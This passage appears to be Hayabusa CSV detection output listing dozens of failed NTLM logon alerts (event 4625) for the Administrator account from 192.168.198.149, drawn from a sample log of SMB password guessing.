+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9elGZ4POExblUCAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XHY9Ig3sqQKNXYqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: voMDzTqYqKpfudKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8m9SJ1aFpvFqClU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dM84lQYVfHhZmgpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O5FrdBbYXWaqFkeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxiNMjsd3YfoCNa2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v1u5uD9SiDFq9VOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pZv9l3b7U8tIVmw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EfPqiBhm6hRX700 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uvqgri2KGIDAlg1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLXZMXKsjOaurgZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXtiRWHDJqpq69Ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeC1T9YkT1hXMcGG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPf6nlwAeuu7cf00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fvVUozD2RuIchN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: KP3rghcrgas3l3q1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MMtcQYoVoM57gTcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFjTWECEep09Abjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jUlguy8tKBo4DSUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GETwMERLpiVtMRkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhas9Vjc193EVcOg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmVAnxq39t7qbcEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13y2nnltjipwZqth | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDQrPBL1VodIcQLR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0Mp4jXeHd3b0CLw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3j89GmIDnG4v7JJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyRLZMoaXJUrPPfn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcoyOKUjEi1uCSpD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWQGVJLcVwgf4YJ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrFqG85mmjTYJ4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DqIh1QHTk470nrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feVbA94p6iT2pBeC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T30YHcE8ZG7FaxW7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaKHRwYtx2lGtOCG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDEDuMmlDZZfdkFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CObqGJQi1hOOI83J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhsE9bQeEwW21bAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: El1qxgjvGS0QSS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vtlr3HwzJcAfSxuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDayr44iXmE63vqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkNoLVOhnS8ayujK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3ggg78jjziKqijrT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BodeSVqeqa5qBQDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yY7yxEcuGwWSJZV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oTlg6cvsz6Z6QpCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3pTALzqu4Ok6CUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kdGagQIEcvQQMp4n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVu4reOyQEIkChHO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EJWNS69MmMGLSnHc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
